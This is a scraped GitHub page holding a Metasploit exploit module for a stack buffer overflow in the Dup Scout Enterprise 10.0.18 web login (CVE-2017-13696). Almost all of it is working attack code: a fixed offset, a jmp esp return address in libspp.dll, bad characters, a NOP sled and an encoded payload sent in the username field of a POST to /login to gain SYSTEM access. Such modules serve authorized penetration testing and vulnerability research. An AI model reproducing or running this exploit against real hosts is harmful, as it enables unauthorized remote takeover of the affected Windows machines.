/metasploit-framework

Permalink
Switch branches/tags
v4.11.7 blog-20150827 blog-20150813 blog-20150730 blog-20150723 blog-20150702 2015071402 2015070901 2015063001 20150827 4.17.25 4.17.24 4.17.23 4.17.22 4.17.21 4.17.20 4.17.19 4.17.18 4.17.17 4.17.16 4.17.15 4.17.14 4.17.13 4.17.12 4.17.11 4.17.10 4.17.9 4.17.8 4.17.7 4.17.6 4.17.5 4.17.4 4.17.3 4.17.2 4.17.1 4.17.0 4.16.65 4.16.64 4.16.63 4.16.62 4.16.61 4.16.60 4.16.59 4.16.58 4.16.57 4.16.56 4.16.55 4.16.54 4.16.53 4.16.52 4.16.51 4.16.50 4.16.49 4.16.48 4.16.47 4.16.46 4.16.45 4.16.44 4.16.43 4.16.42 4.16.41 4.16.40 4.16.39 4.16.38 4.16.37 4.16.36 4.16.35 4.16.34 4.16.33 4.16.32 4.16.31 4.16.30 4.16.29 4.16.28 4.16.27 4.16.26 4.16.25 4.16.24 4.16.23 4.16.22 4.16.21 4.16.20 4.16.19 4.16.18 4.16.17 4.16.16 4.16.15 4.16.14 4.16.13 4.16.12 4.16.11 4.16.10 4.16.9 4.16.8 4.16.7 4.16.6 4.16.5 4.16.4 4.16.3 4.16.2
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
Raw Blame History
103 lines (85 sloc) 2.44 KB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
10.0.18. The buffer overflow exists via the web interface during
login. This gives NT AUTHORITY\SYSTEM access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'sickness' # Original discovery
],
'References' =>
[
[ 'CVE', '2017-13696' ],
[ 'EDB', '43145' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
},
'Targets' =>
[
[ 'Dup Scout Enterprise 10.0.18',
{
'Ret' => 0x10090c83, # jmp esp - libspp.dll
'Offset' => 780
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Nov 14 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
evil = rand_text(target['Offset'])
evil << [target.ret].pack('V')
evil << make_nops(12)
evil << payload.encoded
evil << make_nops(10000 - evil.length)
vprint_status("Evil length: " + evil.length.to_s)
sploit = "username="
sploit << evil
sploit << "&password="
sploit << rand_text(evil.length)
sploit << "\r\n"
print_status("Triggering the exploit now...")
res = send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
})
handler
disconnect
end
end